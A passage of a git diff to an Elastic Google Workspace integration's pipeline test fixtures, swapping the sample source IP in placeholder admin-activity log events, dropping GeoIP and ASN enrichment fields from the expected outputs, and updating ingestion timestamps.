- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974644Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668090800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
 "provider": "admin",
 "action": "INSERT_CHROME_OS_PRINTER",
 "id": "1",
@@ -990,7 +774,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1014,35 +798,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974648100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668096500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
 "provider": "admin",
 "action": "DELETE_CHROME_OS_PRINTER",
 "id": "1",
@@ -1072,7 +838,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1096,35 +862,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974652300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:27.668102100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINTER", "id": "1", @@ -1154,7 +902,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1176,35 +924,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974656200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668107800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_SETTING", "id": "1", 
@@ -1235,7 +965,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1257,35 +987,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974660300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668113500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_USER_SETTING", "id": "1", 
@@ -1316,7 +1028,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1343,35 +1055,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974665100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668136600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "ISSUE_DEVICE_COMMAND", "id": "1", 
@@ -1401,7 +1095,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1423,35 +1117,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974669500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668142200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", "id": 
"1", @@ -1481,7 +1157,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1505,35 +1181,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974673700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:27.668147400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", "id": "1", @@ -1563,7 +1221,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1587,35 +1245,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974677700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668152700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "UPDATE_DEVICE", "id": "1", @@ -1645,7 +1285,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1669,35 +1309,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974682200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668158Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": 
"CHANGE_CONTACTS_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log index 5aececc68aa..40ae2ee7166 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log @@ -1 +1 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json index 2f7aadc0b53..5231f1f2614 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json 
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.646302100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:30.339486Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": 
"CHANGE_CONTACTS_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log index da76df3f767..9de35080e1c 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log 
@@ -1,8 +1,8 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} 